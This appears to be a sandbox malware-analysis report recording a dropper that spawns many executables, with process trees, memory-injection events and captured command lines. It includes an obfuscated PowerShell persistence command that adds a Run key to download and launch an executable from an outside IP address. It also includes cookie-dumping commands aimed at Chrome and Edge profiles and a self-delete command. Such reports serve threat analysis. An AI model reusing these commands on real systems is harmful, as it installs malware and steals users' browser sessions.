HTTP User-Agent header	119	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	130	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

0965DA18BFBF19BAFB1C414882E19081.exefV5iXs9tuRuDPO6zUO_y9ZE2.exemLlTl5lYGvvDZjU93inUQAIv.exe

pid	process
568	0965DA18BFBF19BAFB1C414882E19081.exe
568	0965DA18BFBF19BAFB1C414882E19081.exe
4176	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
4176	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
4176	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
4176	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
3964	mLlTl5lYGvvDZjU93inUQAIv.exe
3964	mLlTl5lYGvvDZjU93inUQAIv.exe
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

mLlTl5lYGvvDZjU93inUQAIv.exe

pid process

3964 mLlTl5lYGvvDZjU93inUQAIv.exe

pid	process
3964	mLlTl5lYGvvDZjU93inUQAIv.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

bhwTOKBahvjc3nPBDtX_8bPT.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	3972	bhwTOKBahvjc3nPBDtX_8bPT.exe
Token: SeRestorePrivilege	3544	WerFault.exe
Token: SeBackupPrivilege	3544	WerFault.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

2708

pid	process
2708

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0965DA18BFBF19BAFB1C414882E19081.exetRyf6PLAuzTj9_gegE9tmrO0.exe

description	pid	process	target process
PID 568 wrote to memory of 3580	568	0965DA18BFBF19BAFB1C414882E19081.exe	0yHLMcuS8aW3ZBPUvE0Sn0Dt.exe
PID 568 wrote to memory of 3580	568	0965DA18BFBF19BAFB1C414882E19081.exe	0yHLMcuS8aW3ZBPUvE0Sn0Dt.exe
PID 568 wrote to memory of 3580	568	0965DA18BFBF19BAFB1C414882E19081.exe	0yHLMcuS8aW3ZBPUvE0Sn0Dt.exe
PID 568 wrote to memory of 4036	568	0965DA18BFBF19BAFB1C414882E19081.exe	IvAce5EZkpqKU_vw7fu1TOdw.exe
PID 568 wrote to memory of 4036	568	0965DA18BFBF19BAFB1C414882E19081.exe	IvAce5EZkpqKU_vw7fu1TOdw.exe
PID 568 wrote to memory of 4036	568	0965DA18BFBF19BAFB1C414882E19081.exe	IvAce5EZkpqKU_vw7fu1TOdw.exe
PID 568 wrote to memory of 1784	568	0965DA18BFBF19BAFB1C414882E19081.exe	sXv49KhZMiUAFPA7LnHyGcq6.exe
PID 568 wrote to memory of 1784	568	0965DA18BFBF19BAFB1C414882E19081.exe	sXv49KhZMiUAFPA7LnHyGcq6.exe
PID 568 wrote to memory of 1784	568	0965DA18BFBF19BAFB1C414882E19081.exe	sXv49KhZMiUAFPA7LnHyGcq6.exe
PID 568 wrote to memory of 4052	568	0965DA18BFBF19BAFB1C414882E19081.exe	6v1qd6wdAWQSWQKjWOTPLK5n.exe
PID 568 wrote to memory of 4052	568	0965DA18BFBF19BAFB1C414882E19081.exe	6v1qd6wdAWQSWQKjWOTPLK5n.exe
PID 568 wrote to memory of 4052	568	0965DA18BFBF19BAFB1C414882E19081.exe	6v1qd6wdAWQSWQKjWOTPLK5n.exe
PID 568 wrote to memory of 2884	568	0965DA18BFBF19BAFB1C414882E19081.exe	Y9W3py_a8Qpxfyh2wDzfI6x8.exe
PID 568 wrote to memory of 2884	568	0965DA18BFBF19BAFB1C414882E19081.exe	Y9W3py_a8Qpxfyh2wDzfI6x8.exe
PID 568 wrote to memory of 2884	568	0965DA18BFBF19BAFB1C414882E19081.exe	Y9W3py_a8Qpxfyh2wDzfI6x8.exe
PID 568 wrote to memory of 3676	568	0965DA18BFBF19BAFB1C414882E19081.exe	88niasm8OCnMjClDSX0zV4BD.exe
PID 568 wrote to memory of 3676	568	0965DA18BFBF19BAFB1C414882E19081.exe	88niasm8OCnMjClDSX0zV4BD.exe
PID 568 wrote to memory of 3676	568	0965DA18BFBF19BAFB1C414882E19081.exe	88niasm8OCnMjClDSX0zV4BD.exe
PID 568 wrote to memory of 3960	568	0965DA18BFBF19BAFB1C414882E19081.exe	gq7oEv_Z_mAjT7UIBTCnPLai.exe
PID 568 wrote to memory of 3960	568	0965DA18BFBF19BAFB1C414882E19081.exe	gq7oEv_Z_mAjT7UIBTCnPLai.exe
PID 568 wrote to memory of 3960	568	0965DA18BFBF19BAFB1C414882E19081.exe	gq7oEv_Z_mAjT7UIBTCnPLai.exe
PID 568 wrote to memory of 3760	568	0965DA18BFBF19BAFB1C414882E19081.exe	wzaiqINl3syh7wyruxwMYLwF.exe
PID 568 wrote to memory of 3760	568	0965DA18BFBF19BAFB1C414882E19081.exe	wzaiqINl3syh7wyruxwMYLwF.exe
PID 568 wrote to memory of 3972	568	0965DA18BFBF19BAFB1C414882E19081.exe	bhwTOKBahvjc3nPBDtX_8bPT.exe
PID 568 wrote to memory of 3972	568	0965DA18BFBF19BAFB1C414882E19081.exe	bhwTOKBahvjc3nPBDtX_8bPT.exe
PID 568 wrote to memory of 3860	568	0965DA18BFBF19BAFB1C414882E19081.exe	JJ_lO1FpXlqp3NJmhHjvCdxH.exe
PID 568 wrote to memory of 3860	568	0965DA18BFBF19BAFB1C414882E19081.exe	JJ_lO1FpXlqp3NJmhHjvCdxH.exe
PID 568 wrote to memory of 3808	568	0965DA18BFBF19BAFB1C414882E19081.exe	9SDJxAx3IjpQXwVHVx9qktlO.exe
PID 568 wrote to memory of 3808	568	0965DA18BFBF19BAFB1C414882E19081.exe	9SDJxAx3IjpQXwVHVx9qktlO.exe
PID 568 wrote to memory of 3808	568	0965DA18BFBF19BAFB1C414882E19081.exe	9SDJxAx3IjpQXwVHVx9qktlO.exe
PID 568 wrote to memory of 3684	568	0965DA18BFBF19BAFB1C414882E19081.exe	1TLBAhBXMZNz_LTblORBMbk8.exe
PID 568 wrote to memory of 3684	568	0965DA18BFBF19BAFB1C414882E19081.exe	1TLBAhBXMZNz_LTblORBMbk8.exe
PID 568 wrote to memory of 3684	568	0965DA18BFBF19BAFB1C414882E19081.exe	1TLBAhBXMZNz_LTblORBMbk8.exe
PID 568 wrote to memory of 3952	568	0965DA18BFBF19BAFB1C414882E19081.exe	p6fhhv5A75kXbpQhqDxG7DCB.exe
PID 568 wrote to memory of 3952	568	0965DA18BFBF19BAFB1C414882E19081.exe	p6fhhv5A75kXbpQhqDxG7DCB.exe
PID 568 wrote to memory of 3952	568	0965DA18BFBF19BAFB1C414882E19081.exe	p6fhhv5A75kXbpQhqDxG7DCB.exe
PID 568 wrote to memory of 3964	568	0965DA18BFBF19BAFB1C414882E19081.exe	mLlTl5lYGvvDZjU93inUQAIv.exe
PID 568 wrote to memory of 3964	568	0965DA18BFBF19BAFB1C414882E19081.exe	mLlTl5lYGvvDZjU93inUQAIv.exe
PID 568 wrote to memory of 3964	568	0965DA18BFBF19BAFB1C414882E19081.exe	mLlTl5lYGvvDZjU93inUQAIv.exe
PID 568 wrote to memory of 3912	568	0965DA18BFBF19BAFB1C414882E19081.exe	7ryv8aRU0M0KkvSXU579AlN_.exe
PID 568 wrote to memory of 3912	568	0965DA18BFBF19BAFB1C414882E19081.exe	7ryv8aRU0M0KkvSXU579AlN_.exe
PID 568 wrote to memory of 3912	568	0965DA18BFBF19BAFB1C414882E19081.exe	7ryv8aRU0M0KkvSXU579AlN_.exe
PID 568 wrote to memory of 3804	568	0965DA18BFBF19BAFB1C414882E19081.exe	ICP1taBj0SFnPNnDmZVKDlIi.exe
PID 568 wrote to memory of 3804	568	0965DA18BFBF19BAFB1C414882E19081.exe	ICP1taBj0SFnPNnDmZVKDlIi.exe
PID 568 wrote to memory of 3804	568	0965DA18BFBF19BAFB1C414882E19081.exe	ICP1taBj0SFnPNnDmZVKDlIi.exe
PID 568 wrote to memory of 2544	568	0965DA18BFBF19BAFB1C414882E19081.exe	GMZH71jb1up22BknQV4ZYz_T.exe
PID 568 wrote to memory of 2544	568	0965DA18BFBF19BAFB1C414882E19081.exe	GMZH71jb1up22BknQV4ZYz_T.exe
PID 568 wrote to memory of 2544	568	0965DA18BFBF19BAFB1C414882E19081.exe	GMZH71jb1up22BknQV4ZYz_T.exe
PID 568 wrote to memory of 792	568	0965DA18BFBF19BAFB1C414882E19081.exe	tRyf6PLAuzTj9_gegE9tmrO0.exe
PID 568 wrote to memory of 792	568	0965DA18BFBF19BAFB1C414882E19081.exe	tRyf6PLAuzTj9_gegE9tmrO0.exe
PID 568 wrote to memory of 792	568	0965DA18BFBF19BAFB1C414882E19081.exe	tRyf6PLAuzTj9_gegE9tmrO0.exe
PID 568 wrote to memory of 3856	568	0965DA18BFBF19BAFB1C414882E19081.exe	ExT3RMqXppew8Ahh52EJMei0.exe
PID 568 wrote to memory of 3856	568	0965DA18BFBF19BAFB1C414882E19081.exe	ExT3RMqXppew8Ahh52EJMei0.exe
PID 568 wrote to memory of 3856	568	0965DA18BFBF19BAFB1C414882E19081.exe	ExT3RMqXppew8Ahh52EJMei0.exe
PID 568 wrote to memory of 3236	568	0965DA18BFBF19BAFB1C414882E19081.exe	figKcv1m9IVxbls3yV5W7DKY.exe
PID 568 wrote to memory of 3236	568	0965DA18BFBF19BAFB1C414882E19081.exe	figKcv1m9IVxbls3yV5W7DKY.exe
PID 568 wrote to memory of 3236	568	0965DA18BFBF19BAFB1C414882E19081.exe	figKcv1m9IVxbls3yV5W7DKY.exe
PID 568 wrote to memory of 4176	568	0965DA18BFBF19BAFB1C414882E19081.exe	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
PID 568 wrote to memory of 4176	568	0965DA18BFBF19BAFB1C414882E19081.exe	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
PID 568 wrote to memory of 4176	568	0965DA18BFBF19BAFB1C414882E19081.exe	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
PID 792 wrote to memory of 4768	792	tRyf6PLAuzTj9_gegE9tmrO0.exe	tRyf6PLAuzTj9_gegE9tmrO0.exe
PID 792 wrote to memory of 4768	792	tRyf6PLAuzTj9_gegE9tmrO0.exe	tRyf6PLAuzTj9_gegE9tmrO0.exe
PID 792 wrote to memory of 4768	792	tRyf6PLAuzTj9_gegE9tmrO0.exe	tRyf6PLAuzTj9_gegE9tmrO0.exe
PID 792 wrote to memory of 4768	792	tRyf6PLAuzTj9_gegE9tmrO0.exe	tRyf6PLAuzTj9_gegE9tmrO0.exe

C:\Users\Admin\AppData\Local\Temp\0965DA18BFBF19BAFB1C414882E19081.exe
"C:\Users\Admin\AppData\Local\Temp\0965DA18BFBF19BAFB1C414882E19081.exe"
1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:568

C:\Users\Admin\Documents\6v1qd6wdAWQSWQKjWOTPLK5n.exe
"C:\Users\Admin\Documents\6v1qd6wdAWQSWQKjWOTPLK5n.exe"
2⤵
- Executes dropped EXE
PID:4052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 860
3⤵
- Program crash
PID:3976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 872
3⤵
- Program crash
PID:2240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 868
3⤵
- Program crash
PID:4824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 876
3⤵
- Program crash
PID:3604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 920
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 888
3⤵
- Program crash
PID:4584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 932
3⤵
- Program crash
PID:3840

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
3⤵
PID:3840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 736
4⤵
- Program crash
PID:4720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 784
4⤵
- Program crash
PID:4612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 772
4⤵
- Program crash
PID:4264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 800
4⤵
- Program crash
PID:3164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 988
4⤵
- Program crash
PID:1384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1036
4⤵
- Program crash
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1076
4⤵
- Program crash
PID:4752

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
4⤵
PID:5236

C:\Users\Admin\Documents\wzaiqINl3syh7wyruxwMYLwF.exe
"C:\Users\Admin\Documents\wzaiqINl3syh7wyruxwMYLwF.exe"
2⤵
- Executes dropped EXE
PID:3760

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:3468

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:3692

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:3124

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:4468

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3760 -s 1540
3⤵
- Program crash
PID:1536

C:\Users\Admin\Documents\p6fhhv5A75kXbpQhqDxG7DCB.exe
"C:\Users\Admin\Documents\p6fhhv5A75kXbpQhqDxG7DCB.exe"
2⤵
- Executes dropped EXE
PID:3952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 660
3⤵
- Program crash
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 648
3⤵
- Program crash
PID:2236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 680
3⤵
- Program crash
PID:4848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 692
3⤵
- Program crash
PID:3588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 852
3⤵
- Program crash
PID:2888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 1064
3⤵
- Program crash
PID:3308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 1148
3⤵
- Program crash
PID:4148

C:\Users\Admin\Documents\ExT3RMqXppew8Ahh52EJMei0.exe
"C:\Users\Admin\Documents\ExT3RMqXppew8Ahh52EJMei0.exe"
2⤵
- Executes dropped EXE
PID:3856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 760
3⤵
- Program crash
PID:2176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 780
3⤵
- Program crash
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 820
3⤵
- Program crash
PID:1384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 856
3⤵
- Program crash
PID:4908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 952
3⤵
- Program crash
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 980
3⤵
- Program crash
PID:4644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 1424
3⤵
- Program crash
PID:4208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 1448
3⤵
- Program crash
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 1480
3⤵
- Program crash
PID:2952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 1508
3⤵
- Program crash
PID:5072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 1660
3⤵
- Program crash
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 1592
3⤵
- Program crash
PID:1460

C:\Users\Admin\Documents\7ryv8aRU0M0KkvSXU579AlN_.exe
"C:\Users\Admin\Documents\7ryv8aRU0M0KkvSXU579AlN_.exe"
2⤵
- Executes dropped EXE
PID:3912

C:\Users\Admin\Documents\7ryv8aRU0M0KkvSXU579AlN_.exe
C:\Users\Admin\Documents\7ryv8aRU0M0KkvSXU579AlN_.exe
3⤵
PID:2296

C:\Users\Admin\Documents\7ryv8aRU0M0KkvSXU579AlN_.exe
C:\Users\Admin\Documents\7ryv8aRU0M0KkvSXU579AlN_.exe
3⤵
PID:4136

C:\Users\Admin\Documents\tRyf6PLAuzTj9_gegE9tmrO0.exe
"C:\Users\Admin\Documents\tRyf6PLAuzTj9_gegE9tmrO0.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:792

C:\Users\Admin\Documents\tRyf6PLAuzTj9_gegE9tmrO0.exe
"C:\Users\Admin\Documents\tRyf6PLAuzTj9_gegE9tmrO0.exe"
3⤵
- Executes dropped EXE
PID:4768

C:\Users\Admin\Documents\GMZH71jb1up22BknQV4ZYz_T.exe
"C:\Users\Admin\Documents\GMZH71jb1up22BknQV4ZYz_T.exe"
2⤵
- Executes dropped EXE
PID:2544

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\GMZH71jb1up22BknQV4ZYz_T.exe"
3⤵
PID:5588

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2836

C:\Users\Admin\Documents\ICP1taBj0SFnPNnDmZVKDlIi.exe
"C:\Users\Admin\Documents\ICP1taBj0SFnPNnDmZVKDlIi.exe"
2⤵
- Executes dropped EXE
PID:3804

C:\Users\Admin\Documents\9SDJxAx3IjpQXwVHVx9qktlO.exe
"C:\Users\Admin\Documents\9SDJxAx3IjpQXwVHVx9qktlO.exe"
2⤵
- Executes dropped EXE
PID:3808

C:\Users\Admin\Documents\9SDJxAx3IjpQXwVHVx9qktlO.exe
"C:\Users\Admin\Documents\9SDJxAx3IjpQXwVHVx9qktlO.exe" -q
3⤵
PID:4432

C:\Users\Admin\Documents\JJ_lO1FpXlqp3NJmhHjvCdxH.exe
"C:\Users\Admin\Documents\JJ_lO1FpXlqp3NJmhHjvCdxH.exe"
2⤵
PID:3860

C:\Users\Admin\Documents\bhwTOKBahvjc3nPBDtX_8bPT.exe
"C:\Users\Admin\Documents\bhwTOKBahvjc3nPBDtX_8bPT.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3972

C:\Users\Admin\AppData\Roaming\4670787.exe
"C:\Users\Admin\AppData\Roaming\4670787.exe"
3⤵
PID:2960

C:\Users\Admin\AppData\Roaming\7829111.exe
"C:\Users\Admin\AppData\Roaming\7829111.exe"
3⤵
PID:4032

C:\Users\Admin\Documents\1TLBAhBXMZNz_LTblORBMbk8.exe
"C:\Users\Admin\Documents\1TLBAhBXMZNz_LTblORBMbk8.exe"
2⤵
- Executes dropped EXE
PID:3684

C:\Users\Admin\Documents\0yHLMcuS8aW3ZBPUvE0Sn0Dt.exe
"C:\Users\Admin\Documents\0yHLMcuS8aW3ZBPUvE0Sn0Dt.exe"
2⤵
- Executes dropped EXE
PID:3580

C:\Users\Admin\Documents\IvAce5EZkpqKU_vw7fu1TOdw.exe
"C:\Users\Admin\Documents\IvAce5EZkpqKU_vw7fu1TOdw.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4036

C:\Users\Admin\Documents\figKcv1m9IVxbls3yV5W7DKY.exe
"C:\Users\Admin\Documents\figKcv1m9IVxbls3yV5W7DKY.exe"
2⤵
- Executes dropped EXE
PID:3236

C:\Users\Admin\Documents\mLlTl5lYGvvDZjU93inUQAIv.exe
"C:\Users\Admin\Documents\mLlTl5lYGvvDZjU93inUQAIv.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3964

C:\Users\Admin\Documents\88niasm8OCnMjClDSX0zV4BD.exe
"C:\Users\Admin\Documents\88niasm8OCnMjClDSX0zV4BD.exe"
2⤵
- Executes dropped EXE
PID:3676

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\88NIAS~1.TMP,S C:\Users\Admin\DOCUME~1\88NIAS~1.EXE
3⤵
- Loads dropped DLL
PID:4872

C:\Windows\SysWOW64\RUNDLL32.EXE
C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\88NIAS~1.TMP,bylGZ1di
4⤵
PID:5656

C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 17894
5⤵
PID:5868

C:\Users\Admin\Documents\gq7oEv_Z_mAjT7UIBTCnPLai.exe
"C:\Users\Admin\Documents\gq7oEv_Z_mAjT7UIBTCnPLai.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3960

C:\Users\Admin\Documents\Y9W3py_a8Qpxfyh2wDzfI6x8.exe
"C:\Users\Admin\Documents\Y9W3py_a8Qpxfyh2wDzfI6x8.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2884

C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
3⤵
PID:5028

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:3692

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:4332

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:5392

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:5740

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:5704

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:4672

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
3⤵
PID:5084

C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
3⤵
PID:3384

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:3968

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:4404

C:\Users\Admin\Documents\sXv49KhZMiUAFPA7LnHyGcq6.exe
"C:\Users\Admin\Documents\sXv49KhZMiUAFPA7LnHyGcq6.exe"
2⤵
- Executes dropped EXE
PID:1784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 760
3⤵
- Program crash
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 784
3⤵
- Program crash
PID:1560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 744
3⤵
- Program crash
PID:3916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 828
3⤵
- Program crash
PID:4540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 956
3⤵
- Program crash
PID:4120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 1004
3⤵
- Program crash
PID:3272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 1032
3⤵
- Program crash
PID:3916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 1436
3⤵
- Program crash
PID:3692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 1472
3⤵
- Program crash
PID:4780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 1376
3⤵
- Program crash
PID:1384

C:\Users\Admin\Documents\fV5iXs9tuRuDPO6zUO_y9ZE2.exe
"C:\Users\Admin\Documents\fV5iXs9tuRuDPO6zUO_y9ZE2.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4176

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFFD4.tmp\tempfile.ps1"
3⤵
PID:4736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFFD4.tmp\tempfile.ps1"
3⤵
PID:4896

C:\Users\Admin\Documents\QtD25qxMVTK2g0iqoDIuScXm.exe
"C:\Users\Admin\Documents\QtD25qxMVTK2g0iqoDIuScXm.exe"
2⤵
- Executes dropped EXE
PID:4892

C:\Users\Admin\AppData\Local\Temp\is-38UJV.tmp\QtD25qxMVTK2g0iqoDIuScXm.tmp
"C:\Users\Admin\AppData\Local\Temp\is-38UJV.tmp\QtD25qxMVTK2g0iqoDIuScXm.tmp" /SL5="$1022C,138429,56832,C:\Users\Admin\Documents\QtD25qxMVTK2g0iqoDIuScXm.exe"
3⤵
- Executes dropped EXE
PID:5104

C:\Users\Admin\AppData\Local\Temp\is-E6QNF.tmp\Setup.exe
